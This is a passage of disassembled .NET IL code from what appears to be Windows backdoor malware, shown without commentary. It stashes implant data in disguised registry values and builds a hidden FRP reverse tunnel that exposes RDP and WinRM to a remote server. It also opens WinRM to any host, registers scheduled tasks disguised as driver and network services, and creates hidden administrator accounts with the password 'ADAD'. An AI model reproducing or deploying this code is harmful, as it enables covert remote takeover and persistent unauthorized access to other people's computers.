Escalation attempted ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave IL_0F94: ret stloc.s V_20 ldstr Error in escalation: {0} ldloc.s V_20 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave IL_0F94: ret ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> blt IL_0558: ldsfld System.Int32 StandaloneProgram.Program::integrity ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_21 ldloc.s V_21 brfalse.s IL_0400: leave.s IL_040E ldloc.s V_21 ldstr ShellStateVersion1 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) stloc.s V_22 ldloc.s V_22 brfalse.s IL_0400: leave.s IL_040E ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_23 ldloc.s V_23 brfalse.s IL_03F2: leave.s IL_0400 ldloc.s V_23 ldstr ShellStateVersion1 ldloc.s V_22 ldc.i4.3 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) ldloc.s V_21 ldstr ShellStateVersion1 callvirt System.Void Microsoft.Win32.RegistryKey::DeleteValue(System.String) ldstr Moved implant data to HKLM ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0400: leave.s IL_040E ldloc.s V_23 brfalse.s IL_03FF: endfinally ldloc.s V_23 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_040E: leave.s IL_0426 ldloc.s V_21 brfalse.s IL_040D: endfinally ldloc.s V_21 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0426: nop stloc.s V_24 ldstr Error moving registry data: {0} ldloc.s V_24 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0426: nop nop <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_25 ldloc.s V_25 brfalse.s IL_0499: leave.s IL_04A7 ldloc.s V_25 ldstr IconSizeVersion1 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) stloc.s V_26 ldloc.s V_26 brfalse.s IL_0499: leave.s IL_04A7 ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_27 ldloc.s V_27 brfalse.s IL_048B: leave.s IL_0499 ldloc.s V_27 ldstr IconSizeVersion1 ldloc.s V_26 ldc.i4.3 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) ldloc.s V_25 ldstr IconSizeVersion1 callvirt System.Void Microsoft.Win32.RegistryKey::DeleteValue(System.String) ldstr Moved RDPWrapper data to HKLM ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0499: leave.s IL_04A7 ldloc.s V_27 brfalse.s IL_0498: endfinally ldloc.s V_27 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_04A7: leave.s IL_04BF ldloc.s V_25 brfalse.s IL_04A6: endfinally ldloc.s V_25 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_04BF: nop stloc.s V_28 ldstr Error moving RDPWrapper data: {0} ldloc.s V_28 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_04BF: nop nop <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_29 ldloc.s V_29 brfalse.s IL_0532: leave.s IL_0540 ldloc.s V_29 ldstr IconUnderlineVersion1 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) stloc.s V_30 ldloc.s V_30 brfalse.s IL_0532: leave.s IL_0540 ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_31 ldloc.s V_31 brfalse.s IL_0524: leave.s IL_0532 ldloc.s V_31 ldstr IconUnderlineVersion1 ldloc.s V_30 ldc.i4.3 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) ldloc.s V_29 ldstr IconUnderlineVersion1 callvirt System.Void Microsoft.Win32.RegistryKey::DeleteValue(System.String) ldstr Moved FRP data to HKLM ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0532: leave.s IL_0540 ldloc.s V_31 brfalse.s IL_0531: endfinally ldloc.s V_31 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0540: leave.s IL_0558 ldloc.s V_29 brfalse.s IL_053F: endfinally ldloc.s V_29 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0558: ldsfld System.Int32 StandaloneProgram.Program::integrity stloc.s V_32 ldstr Error moving FRP data: {0} ldloc.s V_32 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0558: ldsfld System.Int32 StandaloneProgram.Program::integrity ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> blt IL_06C8: ldsfld System.Int32 StandaloneProgram.Program::integrity ldstr C:\ProgramData\frp stloc.s V_33 ldloc.s V_33 ldstr frpc.toml call System.String System.IO.Path::Combine(System.String,System.String) stloc.s V_34 ldloc.s V_33 call System.Boolean System.IO.Directory::Exists(System.String) brtrue.s IL_05A8: ldloc.s V_34 ldloc.s V_33 call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldloc.s V_33 newobj System.Void System.IO.DirectoryInfo::.ctor(System.String) dup <null> callvirt System.IO.FileAttributes System.IO.FileSystemInfo::get_Attributes() ldc.i4.2 <null> or <null> callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) ldstr FRP directory created and hidden ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldloc.s V_34 call System.Boolean System.IO.File::Exists(System.String) brtrue.s IL_05F0: ldloc.s V_34 ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr serverAddr = " stelem.ref <null> dup <null> ldc.i4.1 <null> ldloc.s V_5 stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr " serverPort = 7000 loginFailExit = false auth = { method = "token", token = "ADAD" } user = " stelem.ref <null> dup <null> ldc.i4.3 <null> call System.String System.Environment::get_UserName() stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr " [[proxies]] name = "rdp" type = "tcp" localIP = "127.0.0.1" localPort = 3389 remotePort = 0 [[proxies]] name = "winrm" type = "tcp" localIP = "127.0.0.1" localPort = 5985 remotePort = 0 stelem.ref <null> call System.String System.String::Concat(System.String[]) stloc.s V_35 ldstr FRP config created ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) br.s IL_0627: ldloc.s V_34 ldloc.s V_34 call System.String System.IO.File::ReadAllText(System.String) ldstr serverAddr = " ldloc.s V_5 ldstr " call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_36 ldstr serverAddr\s*=\s*"[^"]*" stloc.s V_37 ldloc.s V_37 ldloc.s V_36 call System.String System.Text.RegularExpressions.Regex::Replace(System.String,System.String,System.String) stloc.s V_35 ldstr FRP config updated (IP only) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldloc.s V_34 ldloc.s V_35 callvirt System.String System.String::Trim() call System.Void System.IO.File::WriteAllText(System.String,System.String) ldstr powershell ldstr -Command "Enable-PSRemoting -Force; Set-Item WSMan:\localhost\Client\TrustedHosts -Value '*' -Force; New-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'LocalAccountTokenFilterPolicy' -Value 1 -PropertyType DWORD -Force; Restart-Service winrm" newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_38 ldloc.s V_38 callvirt System.Void System.Diagnostics.Process::WaitForExit() ldstr WinRM configuration exit code: {0} ldloc.s V_38 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() box System.Int32 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0698: leave.s IL_06B0 ldloc.s V_38 brfalse.s IL_0697: endfinally ldloc.s V_38 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_06B0: leave.s IL_06C8 stloc.s V_39 ldstr Error configuring WinRM: {0} ldloc.s V_39 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_06B0: leave.s IL_06C8 leave.s IL_06C8: ldsfld System.Int32 StandaloneProgram.Program::integrity stloc.s V_40 ldstr Error setting up FRP tunnel: {0} ldloc.s V_40 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_06C8: ldsfld System.Int32 StandaloneProgram.Program::integrity ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> bne.un IL_0764: ldsfld System.Int32 StandaloneProgram.Program::integrity ldstr Admin detected, creating service... ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldc.i4.1 <null> ldstr ShellStateVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) stloc.s V_41 ldstr DriverSvcTask ldstr Driver Support Service ldloc.s V_41 ldc.i4.0 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) ldstr powershell.exe sleep 30; ldc.i4.1 <null> ldstr IconUnderlineVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) ldstr " call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_42 ldstr NetTcpSvc ldstr Manages network TCP connections for system services. ldloc.s V_42 ldc.i4.1 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) ldstr TermSvcHost ldstr Provides support for Terminal Services. ldc.i4.1 <null> ldstr IconSizeVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) leave IL_07F5: nop stloc.s V_43 ldstr Error setting up autorun and task: {0} ldloc.s V_43 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave IL_07F5: nop ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.4 <null> bne.un IL_07F5: nop ldstr System detected, ensuring tasks exist... ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldc.i4.1 <null> ldstr ShellStateVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) stloc.s V_44 ldstr DriverSvcTask ldstr Driver Support Service ldloc.s V_44 ldc.i4.0 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) ldstr powershell.exe sleep 30; ldc.i4.1 <null> ldstr IconUnderlineVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) call System.String System.String::Concat(System.String,System.String) stloc.s V_45 ldstr NetTcpSvc ldstr Manages network TCP connections for system services. ldloc.s V_45 ldc.i4.0 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) ldstr TermSvcHost ldstr Provides support for Terminal Services. ldc.i4.1 <null> ldstr IconSizeVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) ldc.i4.0 <null> call System.Void StandaloneProgram.Program::CreateTask(System.String,System.String,System.String,System.Boolean) leave.s IL_07F5: nop stloc.s V_46 ldstr Error ensuring tasks exist: {0} ldloc.s V_46 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_07F5: nop nop <null> newobj System.Void System.Collections.Generic.List`1<System.String>::.ctor() stloc.s V_47 ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> bne.un.s IL_0816: ldsfld System.Int32 StandaloneProgram.Program::integrity ldloc.s V_47 call System.String System.Environment::get_UserName() callvirt System.Void System.Collections.Generic.List`1<System.String>::Add(System.String) br IL_08A1: ldc.i4.0 ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.4 <null> bne.un IL_08A1: ldc.i4.0 ldstr S-1-5-32-555 call System.Collections.Generic.List`1<System.String> StandaloneProgram.Program::GetLocalGroupMembers(System.String) callvirt System.Collections.Generic.List`1/Enumerator<System.String> System.Collections.Generic.List`1<System.String>::GetEnumerator() stloc.s V_51 br.s IL_0888: ldloca.s V_51 ldloca.s V_51 call System.String System.Collections.Generic.List`1/Enumerator<System.String>::get_Current() stloc.s V_52 ldloc.s V_52 stloc.s V_53 ldloc.s V_52 ldc.i4.s 92 callvirt System.Int32 System.String::LastIndexOf(System.Char) stloc.s V_54 ldloc.s V_54 ldc.i4.0 <null> blt.s IL_086B: ldloc.s V_53 ldloc.s V_54 ldc.i4.1 <null> add <null> ldloc.s V_52 callvirt System.Int32 System.String::get_Length() bge.s IL_086B: ldloc.s V_53 ldloc.s V_52 ldloc.s V_54 ldc.i4.1 <null> add <null> callvirt System.String System.String::Substring(System.Int32) stloc.s V_53 ldloc.s V_53 call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0888: ldloca.s V_51 ldloc.s V_47 ldloc.s V_53 callvirt System.Boolean System.Collections.Generic.List`1<System.String>::Contains(System.String) brtrue.s IL_0888: ldloca.s V_51 ldloc.s V_47 ldloc.s V_53 callvirt System.Void System.Collections.Generic.List`1<System.String>::Add(System.String) ldloca.s V_51 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.String>::MoveNext() brtrue.s IL_0834: ldloca.s V_51 leave.s IL_08A1: ldc.i4.0 ldloca.s V_51 constrained. System.Collections.Generic.List`1/Enumerator<System.String> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldc.i4.0 <null> call System.Void StandaloneProgram.Program::SetLimitBlankPasswordUse(System.Boolean) ldc.i4.0 <null> stloc.s V_48 ldstr SysMaintenance stloc.s V_49 ldloc.s V_47 callvirt System.Collections.Generic.List`1/Enumerator<System.String> System.Collections.Generic.List`1<System.String>::GetEnumerator() stloc.s V_51 br IL_0B7A: ldloca.s V_51 ldloca.s V_51 call System.String System.Collections.Generic.List`1/Enumerator<System.String>::get_Current() stloc.s V_55 ldstr Attempting to configure user: ldloc.s V_55 call System.String System.String::Concat(System.String,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr net ldstr user " ldloc.s V_55 ldstr " call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_56 ldloc.s V_56 callvirt System.IO.StreamReader System.Diagnostics.Process::get_StandardOutput() callvirt System.String System.IO.TextReader::ReadToEnd() ldloc.s V_56 callvirt System.Void System.Diagnostics.Process::WaitForExit() ldloc.s V_49 callvirt System.Boolean System.String::Contains(System.String) brfalse.s IL_0952: leave.s IL_0960 ldstr Skipping user ldloc.s V_55 ldstr due to description containing ldloc.s V_49 call System.String System.String::Concat(System.String,System.String,System.String,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave IL_0B7A: ldloca.s V_51 leave.s IL_0960: ldstr "net" ldloc.s V_56 brfalse.s IL_095F: endfinally ldloc.s V_56 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldstr net ldstr user " ldloc.s V_55 ldstr " "" call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_57 ldloc.s V_57 callvirt System.IO.StreamReader System.Diagnostics.Process::get_StandardOutput() callvirt System.String System.IO.TextReader::ReadToEnd() stloc.s V_58 ldloc.s V_57 callvirt System.IO.StreamReader System.Diagnostics.Process::get_StandardError() callvirt System.String System.IO.TextReader::ReadToEnd() stloc.s V_59 ldloc.s V_57 ldc.i4 10000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> ldstr net user output: ldloc.s V_58 call System.String System.String::Concat(System.String,System.String) ldc.i4.2 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr net user error: ldloc.s V_59 call System.String System.String::Concat(System.String,System.String) ldc.i4.2 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldloc.s V_57 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() ldc.i4 8646 bne.un.s IL_0A0C: ldloc.s V_57 ldstr Microsoft account detected, creating new local user ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldc.i4.0 <null> stloc.s V_48 leave IL_0B86: leave.s IL_0B96 ldloc.s V_57 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() brfalse.s IL_0A1A: leave.s IL_0A28 leave IL_0B7A: ldloca.s V_51 leave.s IL_0A28: ldsfld System.Int32 StandaloneProgram.Program::integrity ldloc.s V_57 brfalse.s IL_0A27: endfinally ldloc.s V_57 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> bne.un.s IL_0A89: ldstr "gpupdate" ldstr powershell ldstr -Command "Add-LocalGroupMember -Group (Get-LocalGroup -SID 'S-1-5-32-555') -Member ' ldloc.s V_55 ldstr '" call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_60 ldloc.s V_60 ldc.i4 5000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> leave.s IL_0A89: ldstr "gpupdate" ldloc.s V_60 brfalse.s IL_0A88: endfinally ldloc.s V_60 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldstr gpupdate ldstr /force newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_61 ldloc.s V_61 ldc.i4 30000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> ldstr gpupdate exit code: {0} ldloc.s V_61 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() box System.Int32 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0AF2: ldstr "powershell" ldloc.s V_61 brfalse.s IL_0AF1: endfinally ldloc.s V_61 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldstr powershell ldstr -Command "Add-LocalGroupMember -Group (Get-LocalGroup -SID 'S-1-5-32-580') -Member ' ldloc.s V_55 ldstr '" call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_62 ldloc.s V_62 ldc.i4 5000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> leave.s IL_0B4B: ldc.i4.1 ldloc.s V_62 brfalse.s IL_0B4A: endfinally ldloc.s V_62 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldc.i4.1 <null> stloc.s V_48 ldstr Configured user: ldloc.s V_55 call System.String System.String::Concat(System.String,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0B86: leave.s IL_0B96 stloc.s V_63 ldstr Error configuring candidate {0}: {1} ldloc.s V_55 ldloc.s V_63 call System.String System.String::Format(System.String,System.Object,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0B7A: ldloca.s V_51 ldloca.s V_51 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.String>::MoveNext() brtrue IL_08BF: ldloca.s V_51 leave.s IL_0B96: ldc.i4.0 ldloca.s V_51 constrained. System.Collections.Generic.List`1/Enumerator<System.String> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldc.i4.0 <null> stloc.s V_50 ldstr if (Get-LocalUser | Where-Object { $_.Description -eq ' ldloc.s V_49 ldstr ' }) { exit 1 } else { exit 0 } call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_64 ldstr powershell ldstr -Command " ldloc.s V_64 ldstr " call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_65 ldloc.s V_65 callvirt System.Void System.Diagnostics.Process::WaitForExit() ldloc.s V_65 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() ldc.i4.1 <null> bne.un.s IL_0BFB: leave.s IL_0C09 ldc.i4.1 <null> stloc.s V_50 ldstr A user with the 'SysMaintenance' description already exists. Skipping creation. ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0C09: leave.s IL_0C21 ldloc.s V_65 brfalse.s IL_0C08: endfinally ldloc.s V_65 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0C21: ldloc.s V_48 stloc.s V_66 ldstr Error checking for existing maintenance user: {0} ldloc.s V_66 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0C21: ldloc.s V_48 ldloc.s V_48 brtrue IL_0ED9: leave.s IL_0EF1 ldloc.s V_50 brtrue IL_0ED9: leave.s IL_0EF1 ldstr Creating new local user ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldc.i4.3 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr Administrator stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr Admin stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr Windows stelem.ref <null> stloc.s V_67 ldc.i4.0 <null> stloc.s V_13 br IL_0EBF: ldloc.s V_13 ldloc.s V_67 ldloc.s V_13 ldelem.ref <null> stloc.s V_68 ldstr net ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr user " stelem.ref <null> dup <null> ldc.i4.1 <null> ldloc.s V_68 stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr " "ADAD" /add /comment:" stelem.ref <null> dup <null> ldc.i4.3 <null> ldloc.s V_49 stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr " stelem.ref <null> call System.String System.String::Concat(System.String[]) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_69 ldloc.s V_69 callvirt System.IO.StreamReader System.Diagnostics.Process::get_StandardOutput() callvirt System.String System.IO.TextReader::ReadToEnd() pop <null> ldloc.s V_69 callvirt System.IO.StreamReader System.Diagnostics.Process::get_StandardError() callvirt System.String System.IO.TextReader::ReadToEnd() pop <null> ldloc.s V_69 ldc.i4 10000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> ldloc.s V_69 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() brtrue IL_0E94: ldstr "Failed to create user " ldstr powershell ldstr -Command "Add-LocalGroupMember -Group (Get-LocalGroup -SID 'S-1-5-32-544') -Member ' ldloc.s V_68 ldstr '" call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process 